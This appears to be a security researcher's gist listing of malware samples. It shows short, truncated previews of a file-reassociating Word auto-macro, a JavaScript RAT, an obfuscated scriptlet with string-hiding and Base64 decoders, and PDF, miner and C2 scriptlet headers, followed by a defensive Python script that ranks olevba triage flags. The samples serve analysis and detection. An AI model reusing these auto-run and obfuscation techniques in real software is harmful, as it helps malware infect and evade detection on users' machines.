John Lambert JohnLaTwC

  • Microsoft Corporation
JohnLaTwC / FileAssocSet
Created February 25, 2017 19:01
Reassociate file types
' Word auto macros: AutoOpen runs when the document is opened, AutoClose when it is closed
Sub AutoOpen()
Call FileTypeSet
End Sub
Sub AutoClose()
Call FileTypeReset
End Sub
Sub FileTypeReset()
' Windows Script Host ProgIDs (.jse .js .vbe .vbs .wsh .wsf) whose file association is being changed
Dim g_szAsocArray: g_szAsocArray = Array("JSEFile", "JSFile", "VBEFile", "VBSFile", "WSHFile", "WSFFile")
Dim oWSH
Dim szExt
JohnLaTwC / 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
Created January 29, 2018 14:33
[uploaded by @JohnLaTwC: VBA from 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f and additional dropped payloads]
## uploaded by @JohnLaTwC
## sample hash: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
===============================================================================
FILE: 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
Type: OLE
JohnLaTwC / malware.txt
Created February 1, 2018 00:07
[VBA malware uploaded by @JohnLaTwC]
## uploaded by @JohnLaTwC
## sample hash: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
===============================================================================
FILE: 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
Type: MHTML
-------------------------------------------------------------------------------
JohnLaTwC / JavaScript RAT
Created February 9, 2018 17:05
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
JohnLaTwC / Daily Scriptlet Decoded
Created February 12, 2018 14:51
Daily Scriptlet
## uploaded by @JohnLaTwC
## sample hash: 50685a379e6bd8f24956170ee1bb0b6a86c37db2112946c208d71f4a76a6ec3f
<!--774E5519EACB8982F86034AD06816217FDA1E5D3AFDE3E94BB5B69C95C34F71B1113CC4A1B2E97F458FD598F9682E44DA63A8C98F32C9A43AF4F9452110B4207--><package >
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
// iZjDo3k: returns its argument reversed (string-reversal layer of the obfuscation)
function iZjDo3k(jfi2VxX){
    var rJK4Qm = "";
    var h8Oy = 0;
    for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){
        rJK4Qm += jfi2VxX.charAt(h8Oy);
    }
    return rJK4Qm;
}
// yZY8ddf: assembles the string "fromCharCode" piecewise and calls String.fromCharCode(kJYu),
// so the method name never appears literally in the script
function yZY8ddf(kJYu) {
    var q2XJc = "r";
    var kKfG = "C";
    var fu = [];
    var keFQz9Vbm2 = "o";
    fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";
    fu[1] = kKfG + "ha";
    fu[2] = q2XJc + kKfG;
    fu[3] = keFQz9Vbm2 + "de";
    var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];
    var mmeF5Ap = String;
    return mmeF5Ap[dmDU5P](kJYu);
}
// xP035QGgN: Base64 digit-to-value lookup ('+' = 62, '/' = 63, everything else by position
// in the alphabet string vm27C7HmF, which is defined elsewhere in the scriptlet)
function xP035QGgN(ag){
    return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);
}
// ph6T0AN: the decoder that consumes the lookup above (preview is truncated here)
function ph6T0AN(fIImISnUlb){
    var vpq8QW3uBI;
    var mRIs;
    var xYYT7RMqs;
    var hQtefhUl;
    var tgHA
## uploaded by @JohnLaTwC
## Sample hash: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
===============================================================================
FILE: 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
Type: OLE
-------------------------------------------------------------------------------
JohnLaTwC / PDF JS threat
Created February 21, 2018 18:52
PDF / JS threat
## Uploaded by @JohnLaTwC
## Sample hash: 55492b266527027fc3fcf9a915e53b2552efe1f51f67f2d2dc356b564df106fc
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
JohnLaTwC / cryptonight WASM miner
Created February 26, 2018 20:07
cryptonight WASM miner
## uploaded by @JohnLaTwC
## sample hash: 001f32784020c51a37d0805894c206ad3af6f64982920f2e5d9fa4ecd2a7f295
## 0080ac8f345ffa6efd580c32f256179bc84d461c7ed0ae8b12840435232cc301
## 008a4edf85ff8f048dec06d60ace786148eb9f7d59154967c0f788672d55a81f
## 0237d082feaa02a12e15cace26c4f82da1c477ef771d932eee5adc6ce9752ec4
## 06f04642cb950f9aef4ead17e1133aa5fbb13ec99ce3e3bf4bb0b8cdd0c36248
## 08ec5e976ef01e43f1ae4f135ea8eb6840b206c74d1240b626e2944feaff86db
## 096fc6c469d3c1e85fcdfbd889441a519e1070f638187804f3c4032495e502d0
## 0a993356554333779fc3dbca6b87cfa327efa4d931205c8c00f32381bdf9bcff
## 0bd10a6fa8c53bda71d7cd892479166e497ee649f4a4c4f27a93b7a4aaff6edd
JohnLaTwC / 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct
Created March 24, 2018 16:39
FruityC2 Scriptlet 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
JohnLaTwC / 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75.txt
Created March 24, 2018 21:31
VBA / PS1 / Assembly 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
## uploaded by @JohnLaTwC
## Sample hash: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
olevba 0.52dev7 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
===============================================================================
FILE: 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
Type: OLE
-------------------------------------------------------------------------------
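Four of the gists above open with an olevba triage line (OLE:MASI-B--, MHT:MASIHB--, OLE:MASI---- and OLE:MAS-HB--). The script below is an added example, not code from any of these gists and not part of oletools: it decodes that Flags column and ranks a batch of triage lines so the auto-executing, IOC-bearing samples come out first. The flag letters, their column order (M A S I H B D V) and the container prefix (OLE, MHT, ...) follow olevba's own triage legend; the scoring in triage_priority() is this example's own assumption, and the report it parses is the four lines from this page joined into one constructed report.

```python
"""Decode and rank the Flags column of olevba triage output.

Added example for this page: not code from the gists above and not part of
oletools. Flag letters and column order (M A S I H B D V) follow olevba's
triage legend; the ranking in triage_priority() is this example's own
assumption, not an olevba feature.
"""
import re

# olevba triage legend in column order; '-' in a column means that check
# did not fire for the file.
FLAG_ORDER = "MASIHBDV"
FLAG_LEGEND = {
    "M": "VBA macros present",
    "A": "auto-executable macro (AutoOpen, Document_Open, ...)",
    "S": "suspicious VBA keywords (Shell, CreateObject, ...)",
    "I": "potential IOCs (URLs, IPs, executable names)",
    "H": "hex-encoded strings",
    "B": "Base64-encoded strings",
    "D": "Dridex-style encoded strings",
    "V": "VBA string expressions (obfuscation)",
}

# e.g. "OLE:MASI-B-- 588cd0fe..."  ->  container, 8 flag columns, filename
TRIAGE_LINE = re.compile(
    r"^(?P<container>[A-Za-z]{3}):(?P<flags>[MASIHBDV-]{8})\s+(?P<name>\S+)$"
)


def parse_triage_line(line):
    """Return (container, set of fired flag letters, filename), or None for
    header/separator lines. Raises ValueError if a letter sits in the wrong
    column, which means the line is not genuine olevba output."""
    m = TRIAGE_LINE.match(line.strip())
    if not m:
        return None
    fired = set()
    for pos, ch in enumerate(m.group("flags")):
        if ch == "-":
            continue
        if ch != FLAG_ORDER[pos]:
            raise ValueError("flag %r out of position %d: %r" % (ch, pos, line))
        fired.add(ch)
    return m.group("container"), fired, m.group("name")


def describe(fired):
    """Human-readable legend entries for the fired flags, in column order."""
    return [FLAG_LEGEND[c] for c in FLAG_ORDER if c in fired]


def triage_priority(container, fired):
    """Assumed ranking: auto-running macros with IOCs or encoded blobs first.
    This is the example's own heuristic, not something olevba computes."""
    score = 0
    if "M" in fired:
        score += 1
    if "A" in fired:
        score += 2
    if "S" in fired:
        score += 1
    if "I" in fired:
        score += 2
    if fired & {"H", "B", "D", "V"}:
        score += 2
    if container == "MHT":
        score += 1  # MHTML wrapper around an Office document is a common evasion
    return score


def triage(text):
    """Parse a whole olevba triage report; return rows sorted by priority as
    (score, container, filename, fired flags as a string)."""
    rows = []
    for line in text.splitlines():
        parsed = parse_triage_line(line)
        if parsed is None:
            continue
        container, fired, name = parsed
        flags = "".join(c for c in FLAG_ORDER if c in fired)
        rows.append((triage_priority(container, fired), container, name, flags))
    rows.sort(key=lambda r: r[0], reverse=True)  # stable: ties keep report order
    return rows


# Constructed input: the four triage lines shown in the gists above, joined
# into one report in the layout olevba prints.
SAMPLE_REPORT = """\
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-- 588cd0fe3ae6fbd2fa4cf8de8db8ae2069ea62c9eaa6854caedf45045780661f
MHT:MASIHB-- 50cde418da81fd42da8b8bb603aaebc30620e53a8b0c4e615a9dc09efc8bc728
OLE:MASI---- 8ec12b0d45c71d87fd78cd69ff01d925f7729621f4172d2326cc238730c8d531
OLE:MAS-HB-- 8ef117d174a5f4bfac84d6dcc99278fc8ff4add8c6f8b569411876779727ad75
"""

if __name__ == "__main__":
    for score, container, name, flags in triage(SAMPLE_REPORT):
        print("%d %s:%-8s %s" % (score, container, flags, name))
        for entry in describe(set(flags)):
            print("    - " + entry)
```

Run it against the output of `olevba -t <dir>` (triage mode) to sort a drop of documents before opening any of them in a full decoder; the position check in parse_triage_line() rejects hand-edited or mangled lines instead of silently miscounting flags.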